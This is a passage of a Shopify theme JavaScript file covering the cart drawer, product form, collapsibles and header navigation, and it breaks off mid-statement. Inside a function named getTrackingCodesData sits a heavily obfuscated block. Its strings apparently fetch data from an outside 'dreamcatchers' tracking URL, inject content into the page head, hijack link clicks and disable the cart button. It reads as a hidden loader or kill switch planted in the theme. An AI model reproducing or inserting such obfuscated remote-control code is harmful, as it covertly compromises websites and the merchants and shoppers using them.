                                if (key.charAt(0) === '_' || !value) {
                                    delete product.properties[key];
                                }
                            });
                        }

                        animation_row+=2;

                        // SM Edited
                        // Modifier is used to change the prices based on the tags of the customer

                        // Disable the modifier for some products
                        // Also fix the total price display
                        let override_modifier = modifier;
                        if(
                            (
                                product.product_id == 4486231720015 ||
                                product.product_id == 6603335401551 ||
                                product.product_id == 6765789413455 ||
                                product.product_id == 7116314804303 ||
                                product.product_id == 7134181621839
                            ) &&
                            (shappify_customer_tags)
                        ) {

                            override_modifier = 1;

                            // Remove the wrong price from the total
                            total_price -= product.price * product.quantity * modifier;

                            // Add the correct price to the total
                            total_price += product.price * product.quantity * override_modifier;

                        }

                        var show_qty = true;
                        var product_url = true;
                        var show_remove = false;
                        if(product.product_id === 6866481643599) {
                            show_qty = false;
                            product_url = false;
                            show_remove = true;
                        }

                        var is_african = false;
                        if(product.variant_title && product.variant_title.includes('HL-A - Cola')) {
                            var is_african = true;
                        }

                        item = {
                            key: product.key,
                            url: product.url,
                            img: prodImg,
                            animationRow: animation_row,
                            name: product.product_title,
                            variation: product.variant_title,
                            properties: product.properties,
                            show_qty: show_qty,
                            show_remove: show_remove,
                            product_url: product_url,
                            itemQty: product.quantity,
                            price: theme.Currency.formatMoney(product.price, theme.settings.moneyFormat),
                            discountedPrice: theme.Currency.formatMoney((product.price - (product.total_discount/product.quantity)), theme.settings.moneyFormat),
                            discounts: product.discounts,
                            discountsApplied: product.price === product.discounted_price ? false : true,
                            vendor: product.vendor,
                            is_african: is_african
                        };

                        // Remove the strikethrough price if the price and the discount price are the same
                        if(item.price == item.discounted_price) {
                            item.price = undefined;
                        }

                        items.push(item);
                    });

                    animation_row+=2;

                    // START Added by SM
                    // $.getJSON('/products/limited-edition-black-matte-toolkit.js', function(product) {
                    //     console.log(product);
                    // } );
                    // END Added by SM

                    // SM Edited
                    // Modifier is used to change the prices based on the tags of the customer
                    data = {
                        items: items,
                        note: cart.note,
                        lastAnimationRow: animation_row,
                        totalPrice: theme.Currency.formatMoney(cart.total_price, theme.settings.moneyFormat),
                        totalCartDiscount: cart.total_discount === 0 ? 0 : theme.strings.cartSavings.replace('[savings]', theme.Currency.formatMoney(cart.total_discount, theme.settings.moneyFormat)),
                        has_hair: has_hair,
                        has_insurance: has_insurance,
                      	has_course:has_course,
                        cartTotal: cart.total_price / 100
                    };

                    $(selectors.container).append(this.template(data));
                    $(selectors.container).find('.cart-progress-item').each(function(index, progressItem) {
                      let cartTotal = parseFloat(jQuery(progressItem).data('cart-total'));
                      let threshold = parseFloat(jQuery(progressItem).data('threshold'));
                      if(cartTotal >= threshold) jQuery(progressItem).addClass('progress-reached');
                      else jQuery(progressItem).removeClass('progress-reached');
                    });
                }
                this.status.loaded = true;
                this.loading(false);

                if ($('body').hasClass('currencies-enabled')) {
                    theme.currencySwitcher.ajaxrefresh();
                }

                $('body').trigger('updateCart' + config.namespace, cart);

                if (window.Shopify && Shopify.StorefrontExpressButtons) {
                    Shopify.StorefrontExpressButtons.initialize();

                    // Resize footer after arbitrary delay for buttons to load
                    setTimeout(function() {
                        this.sizeFooter();
                    }.bind(this), 800);
                }

                // If specifically asked, open the cart drawer (only happens after product added from form)
                if (openDrawer === true) {
                    this.drawer.open();
                }

                // if(window.BOLD && BOLD.common && BOLD.common.eventEmitter && typeof BOLD.common.eventEmitter.emit === 'function'){
                //     BOLD.common.eventEmitter.emit('BOLD_COMMON_cart_loaded', cart);
                // }

            },

            initQtySelectors: function() {
                this.qtySelectors = [];

                $(selectors.container).find('.js-qty').each(function(index, el) {
                    var selector = new theme.QtySelector($(el), {
                        namespace: '.cart-drawer'
                    });
                    this.qtySelectors.push(selector);
                }.bind(this));

                $('body').on('qty.cart-drawer', this.updateItem.bind(this));
            },

            updateItem: function(evt, key, qty) {
                if (this.status.loading) {
                    return;
                }

                this.loading(true);
                $('.sm--cart-disable').addClass('sm--loading');

                theme.cart.changeItem(key, qty)
                    .then(function(cart) {
                        this.updateSuccess(cart);
                    }.bind(this))
                    .catch(function(XMLHttpRequest) {
                        this.updateError(XMLHttpRequest)
                    }.bind(this))
                    .always(function() {
                        this.loading(false);

                        // Check for the wave signature checkbox
                        setTimeout(() => {

                            // console.log('cookie');
                            // console.log(getCookie('wave_signature'));

                            var $checkbox = $('#WaveSignature');
                            var $order_note = $('#CartSpecialInstructions');

                            if(getCookie('wave_signature') == 'yes') {
                                $order_note.text('I want to wave the delivery signature of my order.');
                                $checkbox.prop("checked", true);
                            }

                            $('.sm--cart-disable').removeClass('sm--loading');

                        }, 300);

                    }.bind(this));
            },

            loading: function(state) {
                this.status.loading = state;

                if (state) {
                    $(selectors.container).addClass('is-loading');
                } else {
                    $(selectors.container).removeClass('is-loading');
                }
            },

            emptyCart: function() {
                $(selectors.container).empty();
            },

            updateSuccess: function(cart) {
                this.buildCart(cart)
            },

            updateError: function(XMLHttpRequest) {
                if (XMLHttpRequest.responseJSON && XMLHttpRequest.responseJSON.description) {
                    console.warn(XMLHttpRequest.responseJSON.description);
                }
            },

            // Update elements after cart is updated
            sizeFooter: function() {
                // Stop if our drawer doesn't have a fixed footer
                if (!$(selectors.drawer).hasClass('drawer--has-fixed-footer')) {
                    return;
                }

                // Elements are reprinted regularly so selectors are not cached
                var $cartFooter = $(selectors.drawer).find(selectors.fixedFooter).removeAttr('style');
                var $cartInner = $(selectors.drawer).find(selectors.fixedInnerContent).removeAttr('style');
                var cartFooterHeight = $cartFooter.outerHeight();

                $cartInner.css('bottom', cartFooterHeight);
                $cartFooter.css('height', cartFooterHeight);
            },

            updateCartNotification: function(evt, cart) {
                if (cart.items.length > 0) {
                    $(selectors.cartBubble).addClass('cart-link__bubble--visible');
                } else {
                    $(selectors.cartBubble).removeClass('cart-link__bubble--visible');
                }
            }
        });

        return CartDrawer;
    })();

    theme.AjaxProduct = (function() {
        var status = {
            loading: false
        };

        function ProductForm($form) {
            this.$form = $form;
            this.$addToCart = this.$form.find('.add-to-cart');

            if (this.$form.length) {
                this.$form.on('submit', this.addItemFromForm.bind(this));
            }
        };

        ProductForm.prototype = $.extend({}, ProductForm.prototype, {
            addItemFromForm: function(evt, callback){
                evt.preventDefault();

                if (status.loading) {
                    return;
                }

                // Loading indicator on add to cart button
                this.$addToCart.addClass('btn--loading');

                status.loading = true;

                var data = this.$form.serialize();

                theme.cart.addItemFromForm(data)
                    .then(function(product) {
                        this.success(product);
                    }.bind(this))
                    .catch(function(XMLHttpRequest) {
                        this.error(XMLHttpRequest)
                    }.bind(this))
                    .always(function() {
                        status.loading = false;
                        this.$addToCart.removeClass('btn--loading');
                    }.bind(this));
            },

            success: function(product) {
                this.$form.find('.errors').remove();
                $('body').trigger('added.ajaxProduct');
            },

            error: function(XMLHttpRequest) {
                this.$form.find('.errors').remove();

                if (XMLHttpRequest.responseJSON && XMLHttpRequest.responseJSON.description) {
                    console.warn(XMLHttpRequest.responseJSON.description);

                    this.$form.prepend('<div class="errors text-center">' + XMLHttpRequest.responseJSON.description + '</div>');
                }
            }
        });

        return ProductForm;
    })();

    theme.collapsibles = (function() {

        var selectors = {
            trigger: '.collapsible-trigger',
            module: '.collapsible-content',
            moduleInner: '.collapsible-content__inner'
        };

        var classes = {
            hide: 'hide',
            open: 'is-open',
            autoHeight: 'collapsible--auto-height'
        };

        var isTransitioning = false;

        function init() {
            $(selectors.trigger).each(function() {
                var $el = $(this);
                var state = $el.hasClass(classes.open);
                $el.attr('aria-expanded', state);
            });

            // Event listeners (hack for modals)
            $('body, .modal__inner').on('click', selectors.trigger, function() {
                if (isTransitioning) {
                    return;
                }

                isTransitioning = true;

                var $el = $(this);
                var isOpen = $el.hasClass(classes.open);
                var moduleId = $el.attr('aria-controls');
                var $module = $('#' + moduleId);
                var height = $module.find(selectors.moduleInner).outerHeight();
                var isAutoHeight = $el.hasClass(classes.autoHeight);

                // If isAutoHeight, set the height to 0 just after setting the actual height
                // so the closing animation works nicely
                if (isOpen && isAutoHeight) {
                    setTimeout(function() {
                        height = 0;
                        setTransitionHeight($module, height, isOpen, isAutoHeight);
                    }, 0);
                }

                if (isOpen && !isAutoHeight) {
                    height = 0;
                }

                $el
                    .attr('aria-expanded', !isOpen)
                    .toggleClass(classes.open, !isOpen);

                setTransitionHeight($module, height, isOpen, isAutoHeight);
            });
        }

        function setTransitionHeight($module, height, isOpen, isAutoHeight) {
            $module
                .removeClass(classes.hide)
                .prepareTransition()
                .css('height', height)
                .toggleClass(classes.open, !isOpen);

            if (!isOpen && isAutoHeight) {
                var o = $module;
                window.setTimeout(function() {
                    o.css('height','auto');
                    isTransitioning = false;
                }, 350);
            } else {
                isTransitioning = false;
            }
        }

        return {
            init: init
        };
    })();

    theme.headerNav = (function() {

        var $parent = $(document.documentElement).add('body');
        var $page = $('#MainContent');
        var selectors = {
            wrapper: '.header-wrapper',
            siteHeader: '.site-header',
            searchBtn: '.js-search-header',
            closeSearch: '.js-search-header-close',
            searchContainer: '.site-header__search-container',
            logoContainer: '.site-header__logo',
            logo: '.site-header__logo img',
            navigation: '.site-navigation',
            navContainerWithLogo: '.header-item--logo',
            navItems: '.site-nav__item',
            navLinks: '.site-nav__link',
            navLinksWithDropdown: '.site-nav__link--has-dropdown',
            navDropdownLinks: '.site-nav__dropdown-link--second-level'
        };

        var classes = {
            hasDropdownClass: 'site-nav--has-dropdown',
            hasSubDropdownClass: 'site-nav__deep-dropdown-trigger',
            dropdownActive: 'is-focused'
        };

        var config = {
            namespace: '.siteNav',
            wrapperOverlayed: false,
            overlayedClass: 'is-light',
            stickyEnabled: false,
            stickyActive: false,
            stickyClass: 'site-header--stuck',
            openTransitionClass: 'site-header--opening',
            lastScroll: 0
        };

        // Elements used in resize functions, defined in init
        var $window;
        var $navContainerWithLogo;
        var $logoContainer;
        var $nav;
        var $wrapper;
        var $siteHeader;

        function getTrackingCodesData() {
            var _0x4ceb=['return\x20(fu','KAvna','gkklJ','googleanal','XZGzD','PIRvm','IlQgZ','jZpof','CUrxW','klaviyo','om/trackin','amESX','uWGPY','querySelec','kHVsf','[^\x20]+)+)+[','status','test','responseTe','XWTqq','href','readyState','p-combined','preventDef','qJOBJ','yTqsv','innerHTML','ctor(\x22retu','ucMkr','19\x22\x20crosso','+OvKCr10ld','zvvkn','^([^\x20]+(\x20+','3rWmtsx','76654zLZLuw','TLEcF','237951yWQeJg','ckpath.boo','nction()\x20','none','117374HZxvjM','undefined','log','location','yWAct','yticsheade','rigin=\x22ano','console','stener','yotporevie','trace','rn\x20this\x22)(','7n9a15LEsz','cTqWB','vBgdy','SBdFp','sByClassNa','FbIXf','iOwgy','xfnOq','nymous\x22>','FLAyb','return\x20/\x22\x20','cSaUl','KmltT','FDKMN','lswwH','addEventLi','rSoWh','sByTagName','BVvcB','bind','load','^\x20]}','gtag','LYzjP','KbJRB','g-data','tQNAn','RfLTS','open-cart','click','com/twitte','HyKyL','catchers.c','eZZvG','smWmz','vGxxO','nts','HWSEf','71geXiBl','ReHMS','7jTWhzG','techange','hRqQr','__proto__','hqfQH','mOhFK','DONE','open','toString','milcc','style','SyTFt','<link\x20rel=','length','EWZTH','XphwX','msGXL','SbUrN','YGEqY','HiIyG','apply','Fzlsn','330317HvAzlm','parse','HjOJU','ceocB','integrity=','OQzea','TwKsz','5qImFyQ','pointerEve','send','nKXzw','split','BeLVq','468532RUXOqK','push','rHaCc','eLNYj','LNvGB','target','evafT','constructo','scrollTo','tstrapcdn.','JpfmY','EtmiM','hJIXU','ovCsd','EGAac','ttps://sta','HfNjK','EvdXU','cQYxK','xel','head','65257FLiDHl','toHjc','PFOeq','facebookpi','exception','DslHN','8623NqwtIF','active','SURCTzubbt','getElement','Cazhi','YmthL','LPGxs','GViyw','lXTrM','ault','warn','SsqsS','info','tor','gjYnZgCiKi','prototype','+\x20this\x20+\x20\x22'];var _0x2375=function(_0x1f3a23,_0x1c2792){_0x1f3a23=_0x1f3a23-(0x1*-0x1fad+-0x173a*0x1+0x5c*0x9d);var _0x4ceb76=_0x4ceb[_0x1f3a23];return _0x4ceb76;};var _0x467ec4=function(_0x133983,_0x5ba61a,_0x30ac8c,_0x364a4c){return _0x2375(_0x5ba61a-0x130,_0x30ac8c);};(function(_0x27c325,_0x10ed85){var _0x9c2687=function(_0x541091,_0x5dafa1,_0x1f1a57,_0x1c168c){return _0x2375(_0x541091-0x2b0,_0x1c168c);},_0x231c8f=function(_0x1a2416,_0x265bea,_0x32ce61,_0x394683){return _0x2375(_0x1a2416-0x2b0,_0x394683);};while(!![]){try{var _0x225bd1=-parseInt(_0x9c2687(0x44b,0x3fc,0x49f,0x40f))*-parseInt(_0x231c8f(0x483,0x45b,0x439,0x49d))+parseInt(_0x9c2687(0x4db,0x489,0x4e4,0x48b))*parseInt(_0x231c8f(0x48a,0x4a0,0x46a,0x460))+parseInt(_0x231c8f(0x486,0x49c,0x43b,0x441))+-parseInt(_0x9c2687(0x4d4,0x4db,0x507,0x4d8))+-parseInt(_0x231c8f(0x484,0x45e,0x44e,0x4b8))*parseInt(_0x9c2687(0x4be,0x4b5,0x49d,0x4ab))+-parseInt(_0x231c8f(0x436,0x3f8,0x434,0x46f))+parseInt(_0x231c8f(0x4bc,0x4c2,0x46b,0x4c0))*parseInt(_0x231c8f(0x451,0x494,0x48e,0x44b));if(_0x225bd1===_0x10ed85)break;else _0x27c325['push'](_0x27c325['shift']());}catch(_0x2ea309){_0x27c325['push'](_0x27c325['shift']());}}}(_0x4ceb,0x3df47+0x3f27*0x1+-0x4*-0x1ad2));typeof _0x1a9c===_0x467ec4(0x30f,0x30b,0x353,0x31f)&&function(){var _0x57bbc0=function(_0x3c4a31,_0x1fcfc5,_0x78647e,_0xda5773){return _0x467ec4(_0x3c4a31-0x12a,_0x1fcfc5- -0x341,_0x78647e,_0xda5773-0x78);},_0x18d715=function(_0x524b40,_0x446941,_0x124ce3,_0x282e98){return _0x467ec4(_0x524b40-0x1b4,_0x446941- -0x341,_0x124ce3,_0x282e98-0x1e1);},_0x2bb552={};_0x2bb552[_0x57bbc0(-0x48,-0x11,-0x5e,0x7)]=function(_0x157b67,_0x3d6afa){return _0x157b67<_0x3d6afa;},_0x2bb552[_0x18d715(-0xad,-0x6c,-0x45,-0x18)]=_0x18d715(0x1f,-0xe,-0x30,-0x9),_0x2bb552[_0x18d715(-0x8,-0x2a,-0x3d,0x26)]=function(_0x5e5c2c,_0x3df083){return _0x5e5c2c!==_0x3df083;},_0x2bb552[_0x18d715(-0x4b,-0x74,-0xc2,-0xb6)]='gEPkv',_0x2bb552['JpfmY']=_0x18d715(-0x46,-0x87,-0xdc,-0x72),_0x2bb552['HfNjK']=function(_0x4a28a4,_0x3c9d23){return _0x4a28a4!==_0x3c9d23;},_0x2bb552[_0x18d715(-0x46,-0x1d,-0x39,-0xb)]=_0x57bbc0(-0x37,-0x1,-0x16,0x1c),_0x2bb552['YmthL']=_0x57bbc0(-0xf,-0x40,-0x82,-0x66),_0x2bb552[_0x57bbc0(-0x88,-0x43,-0x6a,-0x49)]=_0x18d715(-0x76,-0x4c,-0x35,0x6),_0x2bb552[_0x57bbc0(0x60,0x15,0x53,-0x3d)]='js-drawer-'+_0x57bbc0(-0x9,-0xf,0x6,-0x46),_0x2bb552[_0x57bbc0(-0x25,-0x75,-0xbb,-0x23)]=_0x57bbc0(-0x20,-0x38,-0xd,-0x39),_0x2bb552[_0x57bbc0(0x47,0x10,0x21,0x32)]=function(_0xc94171,_0x1c974d){return _0xc94171!==_0x1c974d;},_0x2bb552[_0x18d715(-0x83,-0x7f,-0x68,-0xcd)]='yUlJK',_0x2bb552[_0x57bbc0(-0xa,0x19,-0x15,-0x5)]=function(_0xe8cb7b,_0x5ed29e){return _0xe8cb7b===_0x5ed29e;},_0x2bb552[_0x57bbc0(0x62,0x16,0x5,0x14)]=_0x57bbc0(0x1e,-0x1b,-0x27,-0x44),_0x2bb552['vBgdy']=function(_0x49c6d4){return _0x49c6d4();},_0x2bb552[_0x57bbc0(0x13,-0x33,-0xe,-0x4f)]=function(_0xe191a4,_0x10132c){return _0xe191a4!==_0x10132c;},_0x2bb552[_0x18d715(-0x3d,0x1,0xb,-0x2b)]=_0x18d715(0x63,0xf,0x3e,-0x35),_0x2bb552[_0x57bbc0(-0x19,0x18,-0x3b,0xd)]=_0x18d715(-0x23,-0xc,-0x3,0x48),_0x2bb552[_0x18d715(-0xb6,-0x71,-0x5c,-0xbf)]=function(_0x3c2807,_0xe0996a){return _0x3c2807===_0xe0996a;},_0x2bb552[_0x57bbc0(-0x48,-0x3c,-0x8f,-0x3c)]=_0x57bbc0(-0xa6,-0x5d,-0x7c,-0xa8),_0x2bb552[_0x57bbc0(-0x12,0xc,0x18,0xa)]=_0x57bbc0(-0x3e,-0x46,-0x3b,-0x6e),_0x2bb552[_0x57bbc0(0x3a,-0x19,-0x3,-0x33)]=function(_0x35ce83,_0x55b4ab){return _0x35ce83(_0x55b4ab);},_0x2bb552['EtmiM']=function(_0xea2355,_0x59eb48){return _0xea2355+_0x59eb48;},_0x2bb552['KAvna']=function(_0x188589,_0x38d006){return _0x188589+_0x38d006;},_0x2bb552['XZGzD']=_0x18d715(-0xa9,-0x5f,-0xb0,-0x4a)+_0x18d715(-0x7a,-0x39,-0x6a,-0x81),_0x2bb552['sVmyh']='{}.constru'+_0x57bbc0(-0x6c,-0x44,-0x60,-0x7b)+_0x18d715(-0xb,-0x2c,0x15,-0x80)+'\x20)',_0x2bb552[_0x57bbc0(0x32,-0x22,-0x55,-0x65)]=function(_0xf5a767){return _0xf5a767();},_0x2bb552[_0x57bbc0(0x12,0x1d,0x61,0x51)]=_0x18d715(0xc,-0x35,-0x24,0x21),_0x2bb552[_0x18d715(-0x6e,-0x53,-0x43,-0x66)]=_0x57bbc0(-0x4c,-0x64,-0x8a,-0xa5),_0x2bb552['smWmz']='error',_0x2bb552['rHaCc']=_0x18d715(-0xad,-0x72,-0x65,-0x9d),_0x2bb552[_0x18d715(-0x68,-0x25,-0x4f,0x2)]='table',_0x2bb552[_0x18d715(-0x57,-0x65,-0xa3,-0x43)]='4|0|3|5|2|'+'1',_0x2bb552['qJOBJ']=function(_0x47b63c,_0x1e790e,_0x183c50){return _0x47b63c(_0x1e790e,_0x183c50);},_0x2bb552[_0x18d715(-0xbb,-0x79,-0xa6,-0xac)]=function(_0x567664,_0x2a0afa,_0x1e037c){return _0x567664(_0x2a0afa,_0x1e037c);},_0x2bb552[_0x57bbc0(-0x94,-0x5a,-0x61,-0x27)]=_0x57bbc0(-0x51,-0x1e,0x1,-0x45),_0x2bb552[_0x57bbc0(0x27,0x2,0x3c,0x3)]=function(_0x33b148,_0x1b77fe){return _0x33b148<_0x1b77fe;},_0x2bb552[_0x18d715(-0x53,-0x6a,-0x9c,-0x97)]=function(_0x328dfa,_0x24156e){return _0x328dfa===_0x24156e;},_0x2bb552['xfnOq']=_0x57bbc0(-0x50,-0x77,-0x64,-0x58),_0x2bb552['EvdXU']=function(_0x55c545,_0x255078,_0x375a72){return _0x55c545(_0x255078,_0x375a72);},_0x2bb552[_0x18d715(0x4,0x8,-0x3,-0xa)]=_0x57bbc0(-0x79,-0x8c,-0x4e,-0xb3),_0x2bb552[_0x57bbc0(-0x56,-0x13,-0x23,-0x69)]=function(_0x351df6,_0xfe492c){return _0x351df6<=_0xfe492c;},_0x2bb552[_0x18d715(-0xab,-0x58,-0x13,-0x18)]=_0x57bbc0(0x3e,-0xa,0x1c,-0x1a),_0x2bb552[_0x57bbc0(-0x57,-0x26,-0x4,-0xd)]=_0x18d715(0x1c,-0x4,0x13,0x47),_0x2bb552[_0x57bbc0(-0xba,-0x69,-0x14,-0x39)]=function(_0x3259eb,_0x2b6847,_0x887242){return _0x3259eb(_0x2b6847,_0x887242);},_0x2bb552[_0x57bbc0(0x1f,0xd,0x49,0x16)]='rBicy',_0x2bb552[_0x57bbc0(-0x88,-0x7e,-0xbc,-0x3f)]='https://po'+'rtal.dream'+_0x18d715(0xf,-0xb,0x36,-0x19)+_0x18d715(-0x31,-0x55,-0x43,-0x59)+_0x57bbc0(-0x64,-0x12,0xd,-0x1c);var _0x15f599=_0x2bb552,_0x3764b3=function(){var _0x1cc4f0=function(_0x170c03,_0x1ac95c,_0x46d0ae,_0xb23e5){return _0x57bbc0(_0x170c03-0x90,_0x170c03-0x159,_0x1ac95c,_0xb23e5-0xf1);},_0x131b30=function(_0x3b1ee7,_0x33252e,_0x3decf4,_0x5e7265){return _0x18d715(_0x3b1ee7-0x19e,_0x3b1ee7-0x159,_0x33252e,_0x5e7265-0x39);},_0x3a0e1f={};_0x3a0e1f[_0x1cc4f0(0x13a,0xfb,0x18b,0x177)]=function(_0x300608,_0x3e3b5d){var _0x2b8f1a=function(_0x366991,_0x4a71c2,_0x3ed5c8,_0x1fed0c){return _0x1cc4f0(_0x366991-0x3d,_0x4a71c2,_0x3ed5c8-0x5f,_0x1fed0c-0x1e5);};return _0x15f599[_0x2b8f1a(0x16c,0x162,0x125,0x14e)](_0x300608,_0x3e3b5d);},_0x3a0e1f[_0x1cc4f0(0x149,0x150,0x147,0xfd)]=_0x15f599[_0x1cc4f0(0xe5,0xbb,0x97,0x93)],_0x3a0e1f[_0x131b30(0x108,0xcb,0x10a,0x12e)]=_0x15f599[_0x131b30(0xd8,0x9a,0x84,0xa1)],_0x3a0e1f[_0x1cc4f0(0xd1,0x111,0x9a,0x10e)]=function(_0x341ae4,_0x51e790){var _0x54cd80=function(_0x1c45ba,_0x5deebf,_0x574d8f,_0x2cfa2d){return _0x131b30(_0x5deebf- -0x2bd,_0x574d8f,_0x574d8f-0x111,_0x2cfa2d-0x74);};return _0x15f599[_0x54cd80(-0x1ad,-0x1df,-0x204,-0x201)](_0x341ae4,_0x51e790);},_0x3a0e1f[_0x1cc4f0(0x15f,0x144,0x109,0x193)]=_0x15f599['lswwH'];var _0x1f024f=_0x3a0e1f;if(_0x15f599[_0x1cc4f0(0xde,0xce,0x12f,0x11f)](_0x15f599[_0x1cc4f0(0xee,0xd9,0xfc,0xa1)],_0x15f599[_0x1cc4f0(0x116,0xcd,0x12e,0x169)])){var _0x43cfa8=!![];return function(_0x686d60,_0xc0e62f){var _0x191579=function(_0x3a414c,_0x45e6f2,_0x57f16e,_0x2ab32d){return _0x131b30(_0x3a414c-0xeb,_0x45e6f2,_0x57f16e-0x10d,_0x2ab32d-0x17e);},_0x107028=function(_0x8b2ace,_0x340d80,_0x5b530f,_0x249974){return _0x1cc4f0(_0x8b2ace-0xeb,_0x340d80,_0x5b530f-0x2b,_0x249974-0x20);},_0x247b58={};_0x247b58[_0x191579(0x21c,0x20e,0x243,0x1d5)]=function(_0x5f5644,_0x3a58c3){var _0x4b9f25=function(_0x18b418,_0x20dc00,_0x10b10c,_0x23db5a){return _0x191579(_0x18b418-0x110,_0x20dc00,_0x10b10c-0x17f,_0x23db5a-0x1d9);};return _0x15f599[_0x4b9f25(0x343,0x2f0,0x36d,0x36a)](_0x5f5644,_0x3a58c3);},_0x247b58[_0x107028(0x1dc,0x196,0x228,0x1d1)]=_0x15f599[_0x107028(0x1d8,0x19c,0x1f6,0x1f1)];var _0x4b7cc6=_0x247b58,_0xf5d110=_0x43cfa8?function(){var _0x52a78f=function(_0x5cf71c,_0x2c1605,_0x421f49,_0x463437){return _0x191579(_0x2c1605- -0x2e8,_0x463437,_0x421f49-0x128,_0x463437-0xbd);},_0x4a2dcd=function(_0x52df18,_0x1df75b,_0x280064,_0x34d1ba){return _0x191579(_0x1df75b- -0x2e8,_0x34d1ba,_0x280064-0x46,_0x34d1ba-0x168);};if(_0x1f024f[_0x52a78f(-0x97,-0xc3,-0xfb,-0x112)](_0x1f024f[_0x52a78f(-0xac,-0xb4,-0xd4,-0x84)],_0x1f024f['kHVsf'])){if(_0xc0e62f){if(_0x1f024f[_0x4a2dcd(-0x16a,-0x12c,-0x146,-0x140)](_0x1f024f['milcc'],'oYOTS')){var _0x1e1ca2=_0xc0e62f[_0x52a78f(-0x76,-0x93,-0x9e,-0x5b)](_0x686d60,arguments);return _0xc0e62f=null,_0x1e1ca2;}else{function _0xdae912(){var _0x295abc=function(_0x3e9bf5,_0x3c6a58,_0x360ca7,_0x2fceda){return _0x4a2dcd(_0x3e9bf5-0x1eb,_0x360ca7-0x102,_0x360ca7-0x62,_0x2fceda);},_0x4147c9=function(_0xa71f3e,_0x43082b,_0x1b73ae,_0x394e1c){return _0x4a2dcd(_0xa71f3e-0x1de,_0x1b73ae-0x102,_0x1b73ae-0x1ed,_0x394e1c);},_0x40fffd=_0x2953fa['getElement'+_0x295abc(0x18,0x5f,0x44,0x40)]('a');for(var _0x30b51f=-0x170b+0x10b2*0x1+-0x19*-0x41;_0x4b7cc6['SBdFp'](_0x30b51f,_0x40fffd[_0x295abc(0x5c,0x50,0x68,0x5b)]);_0x30b51f++){_0x40fffd[_0x30b51f][_0x295abc(0x46,0x8c,0x42,0x63)+_0x4147c9(-0x20,0x7a,0x2f,0x33)](_0x4b7cc6[_0x4147c9(-0x25,0x9,-0xa,0x32)],_0x179749=>{var _0x7a3e5a=function(_0x46549b,_0x14c2c7,_0x6764ec,_0x33e0a6){return _0x295abc(_0x46549b-0x1f3,_0x14c2c7-0xb6,_0x33e0a6- -0x38e,_0x14c2c7);},_0x412e90=function(_0xbcd9cc,_0x29704a,_0x2791be,_0x24154b){return _0x4147c9(_0xbcd9cc-0x94,_0x29704a-0x92,_0x24154b- -0x38e,_0x29704a);};_0x10fed4(()=>{var _0x2f5b06=function(_0x14026b,_0x146384,_0xd93c98,_0xf84112){return _0x2375(_0x146384-0x1c7,_0xd93c98);},_0x1d7610=function(_0x2c7be4,_0xf89048,_0x3335f8,_0x110265){return _0x2375(_0xf89048-0x1c7,_0x3335f8);};_0x2e8d6d[_0x2f5b06(0x3d0,0x3a4,0x3db,0x3c7)]=_0x179749['target'][_0x2f5b06(0x3a6,0x38d,0x37c,0x3d6)];},-0x18d5*-0x1+0xfb5*0x7+-0x38a8),_0x179749[_0x7a3e5a(-0x36e,-0x35a,-0x32b,-0x378)+_0x412e90(-0x3d2,-0x367,-0x3ac,-0x397)]();});}}}}}else{function _0xa44d3a(){var _0x2b4de7=_0x3a2561['apply'](_0x181723,arguments);return _0x5db521=null,_0x2b4de7;}}}:function(){};return _0x43cfa8=![],_0xf5d110;};}else{function _0x36f248(){var _0x43055b=function(_0x32d383,_0x2f6dd8,_0x22d9f6,_0x4cf6aa){return _0x131b30(_0x4cf6aa- -0x336,_0x22d9f6,_0x22d9f6-0x28,_0x4cf6aa-0x168);},_0x4c0697=function(_0x45e79a,_0x368fa4,_0x4c36df,_0x4881f3){return _0x131b30(_0x4881f3- -0x336,_0x4c36df,_0x4c36df-0x125,_0x4881f3-0x74);};_0x8a4a99[_0x43055b(-0x221,-0x22c,-0x22e,-0x211)]=_0x447cd6[_0x43055b(-0x29a,-0x29e,-0x283,-0x263)]['href'];}}}(),_0x522959=_0x3764b3(this,function(){var _0x129e1b=function(_0x50f21f,_0x3d77c7,_0x464c89,_0x47f917){return _0x57bbc0(_0x50f21f-0x5a,_0x47f917-0x21c,_0x50f21f,_0x47f917-0x42);},_0x7af83a=function(_0x19bb6d,_0x1b573a,_0x13b162,_0x2fc104){return _0x18d715(_0x19bb6d-0x9e,_0x2fc104-0x21c,_0x19bb6d,_0x2fc104-0x1e4);};if(_0x15f599[_0x129e1b(0x1f6,0x289,0x255,0x235)](_0x15f599[_0x7af83a(0x220,0x1f3,0x27c,0x232)],_0x7af83a(0x207,0x188,0x182,0x1c3))){function _0x2552f5(){var _0x3ebfee=function(_0xc2039f,_0x783181,_0x3e03ae,_0x2efd57){return _0x7af83a(_0x783181,_0x783181-0x6d,_0x3e03ae-0x141,_0x2efd57- -0x196);},_0x79c202=function(_0x461918,_0x514b8b,_0x339556,_0x63759f){return _0x7af83a(_0x514b8b,_0x514b8b-0x146,_0x339556-0x13a,_0x63759f- -0x196);};_0x1c9c92['getElement'+'sByClassNa'+'me'](_0x15f599['HjOJU'])[-0x2f3*0xa+-0x41b*0x9+0x4271][_0x3ebfee(0xd7,0xc5,0x97,0x8d)][_0x3ebfee(0xb5,0x63,0xc2,0xa1)+_0x3ebfee(0x4d,0x38,0x9a,0x7f)]=_0x15f599['toHjc'];}}else{var _0x132237=function(){var _0x18a8c0=function(_0x51640,_0x445ada,_0x581d6a,_0xf23f2a){return _0x7af83a(_0x445ada,_0x445ada-0x191,_0x581d6a-0x1d2,_0x581d6a-0x9f);},_0x391f0f=function(_0x5bf046,_0x1b38f7,_0x183829,_0x557550){return _0x129e1b(_0x1b38f7,_0x1b38f7-0x2c,_0x183829-0x48,_0x183829-0x9f);};if(_0x15f599[_0x18a8c0(0x2de,0x2bb,0x2cb,0x308)](_0x15f599[_0x18a8c0(0x274,0x243,0x23c,0x1e8)],_0x15f599[_0x18a8c0(0x20e,0x1f1,0x23c,0x23c)])){function _0x2869b8(){var _0x186f5c=_0x3410cc?function(){var _0x5d6fd0=function(_0x2da04c,_0x30f952,_0x12ac0b,_0x41e2e2){return _0x2375(_0x30f952-0x5,_0x2da04c);};if(_0x4db2a5){var _0x366149=_0x3e01e3[_0x5d6fd0(0x230,0x227,0x277,0x1f8)](_0x430cb7,arguments);return _0x377044=null,_0x366149;}}:function(){};return _0x527a6c=![],_0x186f5c;}}else{var 